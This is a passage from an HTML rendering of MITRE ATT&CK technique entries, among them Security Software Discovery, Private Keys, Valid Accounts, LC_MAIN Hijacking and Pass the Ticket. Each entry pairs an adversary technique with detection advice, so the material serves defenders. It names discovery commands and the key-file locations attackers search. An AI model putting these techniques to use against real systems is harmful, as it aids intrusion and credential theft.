<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 648. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1086">https://attack.mitre.org/wiki/Technique/T1086</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/PowerShellEmpire/Empire">https://github.com/PowerShellEmpire/Empire</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf">http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/jaredhaight/PSAttack">https://github.com/jaredhaight/PSAttack</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx">https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/02/greater%20visibilityt.html">https://www.fireeye.com/blog/threat-research/2016/02/greater%20visibilityt.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_security_software_discovery"><a class="anchor" href="#_security_software_discovery"></a><a class="link" href="#_security_software_discovery">Security Software Discovery</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Example commands that can be used to obtain security software information are netsh, &lt;code&gt;reg query&lt;/code&gt; with Reg, &lt;code&gt;dir&lt;/code&gt; with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>It&#8217;s becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 649. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1063">https://attack.mitre.org/wiki/Technique/T1063</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trap"><a class="anchor" href="#_trap"></a><a class="link" href="#_trap">Trap</a></h3>
<div class="paragraph">
<p>The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.</p>
</div>
<div class="paragraph">
<p>Detection: Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 650. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1154">https://attack.mitre.org/wiki/Technique/T1154</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_modify_existing_service"><a class="anchor" href="#_modify_existing_service"></a><a class="link" href="#_modify_existing_service">Modify Existing Service</a></h3>
<div class="paragraph">
<p>Windows service configuration information, including the file path to the service&#8217;s executable, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg.</p>
</div>
<div class="paragraph">
<p>Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.</p>
</div>
<div class="paragraph">
<p>Detection: Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.cmd commands or scripts.</p>
</div>
<div class="paragraph">
<p>Look for abnormal process call trees from known services and for execution of other commands that could relate to Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 651. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1031">https://attack.mitre.org/wiki/Technique/T1031</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_standard_cryptographic_protocol"><a class="anchor" href="#_standard_cryptographic_protocol"></a><a class="link" href="#_standard_cryptographic_protocol">Standard Cryptographic Protocol</a></h3>
<div class="paragraph">
<p>Adversaries use command and control over an encrypted channel using a known encryption protocol like HTTPS or SSL/TLS. The use of strong encryption makes it difficult for defenders to detect signatures within adversary command and control traffic.</p>
</div>
<div class="paragraph">
<p>Some adversaries may use other encryption protocols and algorithms with symmetric keys, such as RC4, that rely on encryption keys encoded into malware configuration files and not public key cryptography. Such keys may be obtained through malware reverse engineering.</p>
</div>
<div class="paragraph">
<p>Detection: SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.[[Citation: SANS Decrypting SSL]] SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.[[Citation: SEI SSL Inspection Risks]]</p>
</div>
<div class="paragraph">
<p>If malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.[[Citation: Fidelis DarkComet]]</p>
</div>
<div class="paragraph">
<p>In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Malware reverse engineering, Process use of network, Process monitoring, SSL/TLS inspection</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 652. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1032">https://attack.mitre.org/wiki/Technique/T1032</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf">https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840">http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html">https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_private_keys"><a class="anchor" href="#_private_keys"></a><a class="link" href="#_private_keys">Private Keys</a></h3>
<div class="paragraph">
<p>Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.Remote Services like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on *nix-based systems or &lt;code&gt;C:\Users\(username)\.ssh\&lt;/code&gt; on Windows.</p>
</div>
<div class="paragraph">
<p>Private keys should require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line.</p>
</div>
<div class="paragraph">
<p>Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.[[Citation: Kaspersky Careto]][[Citation: Palo Alto Prince of Persia]]</p>
</div>
<div class="paragraph">
<p>Detection: Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring</p>
</div>
<div class="paragraph">
<p>Contributors: Itzik Kotler, SafeBreach</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 653. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1145">https://attack.mitre.org/wiki/Technique/T1145</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/">https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask%20v1.0.pdf">https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask%20v1.0.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Public-key%20cryptography">https://en.wikipedia.org/wiki/Public-key%20cryptography</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_valid_accounts"><a class="anchor" href="#_valid_accounts"></a><a class="link" href="#_valid_accounts">Valid Accounts</a></h3>
<div class="paragraph">
<p>Adversaries may steal the credentials of a specific user or service account using [[Credential Access]] techniques. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network and may even be used for persistent access to remote systems. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.</p>
</div>
<div class="paragraph">
<p>Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful.</p>
</div>
<div class="paragraph">
<p>The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.[[Citation: TechNet Credential Theft]]</p>
</div>
<div class="paragraph">
<p>Detection: Configure robust, consistent account activity audit policies across the enterprise.[[Citation: TechNet Audit Policy]] Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).</p>
</div>
<div class="paragraph">
<p>Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 654. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1078">https://attack.mitre.org/wiki/Technique/T1078</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dn487457.aspx">https://technet.microsoft.com/en-us/library/dn487457.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dn535501.aspx">https://technet.microsoft.com/en-us/library/dn535501.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lc_main_hijacking"><a class="anchor" href="#_lc_main_hijacking"></a><a class="link" href="#_lc_main_hijacking">LC_MAIN Hijacking</a></h3>
<div class="paragraph">
<p>As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binarys entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD [[Citation: Prolific OSX Malware History]]. The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesnt know anything was different [[Citation: Methods of Mac Malware Persistence]]. By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.</p>
</div>
<div class="paragraph">
<p>Detection: Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata, Malware reverse engineering, Process Monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 655. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1149">https://attack.mitre.org/wiki/Technique/T1149</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf">https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_service_discovery"><a class="anchor" href="#_system_service_discovery"></a><a class="link" href="#_system_service_discovery">System Service Discovery</a></h3>
<div class="paragraph">
<p>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 656. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1007">https://attack.mitre.org/wiki/Technique/T1007</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_owner_user_discovery"><a class="anchor" href="#_system_owner_user_discovery"></a><a class="link" href="#_system_owner_user_discovery">System Owner/User Discovery</a></h3>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using Credential Dumping. The information may be collected in a number of different ways using other Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 657. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1033">https://attack.mitre.org/wiki/Technique/T1033</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_multiband_communication"><a class="anchor" href="#_multiband_communication"></a><a class="link" href="#_multiband_communication">Multiband Communication</a></h3>
<div class="paragraph">
<p>Some adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]] Correlating alerts between multiple communication channels can further help identify command-and-control behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 658. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1026">https://attack.mitre.org/wiki/Technique/T1026</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pass_the_ticket"><a class="anchor" href="#_pass_the_ticket"></a><a class="link" href="#_pass_the_ticket">Pass the Ticket</a></h3>
<div class="paragraph">
<p>Pass the ticket (PtT)Valid Accounts are captured by Credential Dumping. A user&#8217;s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.[[Citation: ADSecurity AD Kerberos Attacks]][[Citation: GentilKiwi Pass the Ticket]]</p>
</div>
<div class="paragraph">
<p>Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).[[Citation: ADSecurity AD Kerberos Attacks]]</p>
</div>
<div class="paragraph">
<p>Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.[[Citation: Campbell 2014]]</p>
</div>
<div class="paragraph">
<p>Detection: Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.</p>
</div>
<div class="paragraph">
<p>Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.[[Citation: CERT-EU Golden Ticket Protection]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<div class="paragraph">
<p>Contributors: Ryan Becwar</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 659. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1097">https://attack.mitre.org/wiki/Technique/T1097</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf">http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.aorato.com/labs/pass-the-ticket/">http://www.aorato.com/labs/pass-the-ticket/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://adsecurity.org/?p=556">https://adsecurity.org/?p=556</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos">http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_remote_management"><a class="anchor" href="#_windows_remote_management"></a><a class="link" href="#_windows_remote_management">Windows Remote Management</a></h3>
<div class="paragraph">
<p>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).[[Citation: Microsoft WinRM]] It may be called with the &lt;code&gt;winrm&lt;/code&gt; command or by any number of programs such as PowerShell.[[Citation: Jacobsen 2014]]</p>
</div>
<div class="paragraph">
<p>Detection: Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Authentication logs, Netflow/Enclave netflow, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 660. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1028">https://attack.mitre.org/wiki/Technique/T1028</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/aa384426">http://msdn.microsoft.com/en-us/library/aa384426</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideee.com/slide/lateral-movement-with-powershell">http://www.slideee.com/slide/lateral-movement-with-powershell</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_audio_capture"><a class="anchor" href="#_audio_capture"></a><a class="link" href="#_audio_capture">Audio Capture</a></h3>
<div class="paragraph">
<p>An adversary can leverage a computer&#8217;s peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.</p>
</div>
<div class="paragraph">
<p>Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</p>
</div>
<div class="paragraph">
<p>Detection: Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.</p>
</div>
<div class="paragraph">
<p>Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring, File monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 661. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
